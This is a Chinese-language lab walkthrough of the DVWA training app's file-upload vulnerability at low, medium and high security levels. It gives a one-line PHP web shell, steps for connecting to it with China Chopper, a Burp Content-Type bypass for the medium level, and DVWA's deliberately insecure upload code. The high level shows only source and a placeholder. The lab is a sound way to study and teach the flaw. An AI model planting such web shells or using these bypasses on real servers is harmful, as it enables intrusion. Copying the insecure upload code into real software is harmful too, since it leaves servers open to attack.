不定期补充、修正、更新;欢迎大家讨论和指正
目录
- 概览
- LOW
-
- 源码
- MEDIUM
-
- 源码
- HIGH
-
- 源码
概览
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
原文链接:https://blog.csdn.net/qq_42636435/article/details/88096844
环境准备:
win7:192.168.126.135
kali:192.168.126.129
owasp:192.168.126.134
工具:chopper(中国菜刀) BurpSuite
木马: <?php @eval($_POST['hacker']); ?>
LOW
进入upload、上传写好木马的文件
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2cs0TPn1kMRR0TyUFROBDOsJGcohVYsR2MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL5EDNwMDMyYTM3ADNwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
复制提示上传的文件所在目录路径,复制到搜索栏(记得删除最后的#号),回车得到文件所在的真实路径,复制。
进入win7 打开chopper,右键新建,输入复制的文件所在目录路径,以及木马里设置的密码。
登录成功!
源码
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
MEDIUM
查看源码可以看到文件上传的类型以及大小受到了限制,只能是jpeg格式,注意单纯地改文件后缀名是没用的。
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
这里涉及到MIME(Multipurpose Internet Mail Extensions,媒体类型 )
MIME类型
可以看到上传没用成功。
这时可以用第三方工具将木马文件的MIME类型转换成/image/jpeg
使用BurpSuite的代理和拦截的功能,将浏览器请求服务器的http请求拦截并修改。
进入kali 为了方便,直接在kali上的浏览器设置代理,代理设为127.0.01即可
启动BurpSuite作为代理,一开始有时会弹出什么需要JRE功能的更新,无视即可。
进入后无视更新,使用默认配置 next->Start Burp进入
进入proxy代理功能,当拦截开启时,可以发现在DVWA上传时左上角一直在刷新。
修改Content-Type:的内容为image/jpeg后关闭拦截
上传成功、后面的操作如出一辙。
源码
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
HIGH
源码
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}
?>
- 占坑